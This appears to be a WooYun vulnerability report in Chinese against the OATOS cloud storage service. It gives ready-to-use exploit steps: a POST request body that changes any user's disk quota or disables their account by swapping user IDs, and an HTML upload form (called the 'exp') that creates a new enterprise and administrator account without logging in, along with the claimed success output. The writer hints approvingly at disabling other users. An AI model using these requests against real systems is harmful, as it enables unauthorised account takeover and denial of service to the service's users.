WooYun.org

再看下面这个，可以任意改空间和禁用用户的
先看自己普通账户的ID号
登录就可以看见当前用户的ID号了，比如
{"entId":731227434,"userId":731227444}
731227444就是我当前登录的用户的id号。
在post数据到http://app.oatos.com/os/flexService的时候
添加serviceType: /sc/user/updatePersonalDiskSize
数据如下：
{"otherUserId":731227444,"personalDiskEnabled":true,"personalDiskSize":2048000,"userId":731227435,"entId":731227434}
entId是企业ID号，otherUserId是被编辑的用户的ID号，userid就是发起这个编辑行为的用户id号。personalDiskSize是大小，字节。
personalDiskEnabled是用户是否启用网盘功能，如果改为false的话………………你懂的。

默认添加是100，现在直接自己改自己的为2G了
当然大小不能超过该企业总额。
最后任意添加一个企业同时添加该企业的管理员（无需登录）
给exp先
http://app.oatos.com/os/flexService/pub/user/parseImportUsers
<html>
<form action="http://app.oatos.com/os/flexService/pub/user/parseImportUsers" name="test" method="post" enctype="multipart/form-data">
<input type="file" name="file" size="23" id="file" />
<input type="submit" value="Submit" />
</form>
</html>
构造一个excel，提交的时候选择这个excel

用exp提交数据回显相关信息：

成功添加123123账户！同时也是管理员账户，企业号也是123123！

比免费注册的空间还大啊…………